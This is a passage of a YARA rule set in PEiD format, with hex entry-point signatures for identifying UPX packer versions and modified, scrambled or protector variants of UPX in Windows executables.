9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? 
FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 D8 01 00 00 83 CD FF 31 DB 90 90 90 90 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 90 90 B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 
00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? 
?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_102_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_030_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 04 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? 
E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 1A 00 00 00 8D BE E6 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 
8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Delphi_stub_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 32 2E 30 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 
50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n        $b = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 20 5B 35 30 30 6D 68 7A 5D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v070_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 
8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_093_UnHack32_11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 80 43 00 8D BE 00 90 FC FF C7 87 D0 64 04 00 26 81 74 8D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_093_UnHack32_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 A0 43 00 8D BE 00 70 FC FF C7 87 D0 84 04 00 98 C1 DF 2D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 
8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n        $b = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 
00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 05 FF FF FF 85 C0 0F 84 06 03 00 00 89 85 C5 FE FF FF E8 00 00 00 00 5B B9 31 89 40 00 81 E9 2E 86 40 00 03 D9 50 53 E8 3D 02 00 00 61 03 BD A9 FE FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 09 FF FF FF FF B5 05 FF FF FF 56 57 FF 95 C5 FE FF FF 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB CE 68 00 80 00 00 6A 00 FF B5 C5 FE FF FF FF 95 09 FF FF FF 8D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 EC 01 00 00 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_by_GurueXe: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 
00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_099_100_101_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE AE 00 00 00 8D BE 52 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? 60 BE 8D BE 57 83 CD }\r\n        $b = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? 31 DB ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? 
B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 
